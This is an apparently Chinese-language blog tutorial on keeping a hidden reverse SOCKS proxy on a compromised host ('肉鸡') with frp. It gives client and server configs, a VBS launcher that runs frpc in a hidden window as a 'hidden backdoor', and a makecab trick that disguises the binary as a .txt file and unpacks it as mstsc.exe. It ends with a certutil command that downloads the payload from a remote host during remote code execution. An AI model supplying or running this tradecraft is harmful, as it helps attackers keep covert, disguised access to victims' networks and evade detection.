frp创建隐匿反向socks代理

之前在《科学养鸡指南》中提到过SS配合frp的反向socks代理组合，后来才发现frp本身就可以的，借此机会来回顾下frp远程肉鸡的上传与隐匿运行。

隐匿后门配置

#frpc.ini
[common]
server_addr = *.*.*.*
server_port = 7000
token = 123456

[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5

#frps.ini
[common]
bind_addr =0.0.0.0
bind_port =7000
token = 123456

#frpc.bat
frpc.exe -c frpc.ini

#frpc.vbs
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c frpc.bat",vbhide

压缩解压

减少文件体积，提高文件上传速度。

#压缩
makecab frpc.exe frpc.txt

压缩比例效果如下：

#解压
expand C:\Users\RabbitMask\Desktop\test\frpc.txt C:\Users\RabbitMask\Desktop\test\mstsc.exe

解压效果如下，与原文件完全一致：

远程下载

certutil -urlcache -split -f http://192.168.1.1/frpc.txt  1.txt

为什么不用bitsadmin？因为许多时候不适合交互式界面，尤其是RCE。
为什么不用wget？因为powershell版本太低的话不支持wget。
所以相对来讲certutil在cmdlet下算是最佳选择，如果目标支持powershell，Nishang、Invoke-WebRequest、powercat等等等等等任你选择，太多太多不做展开。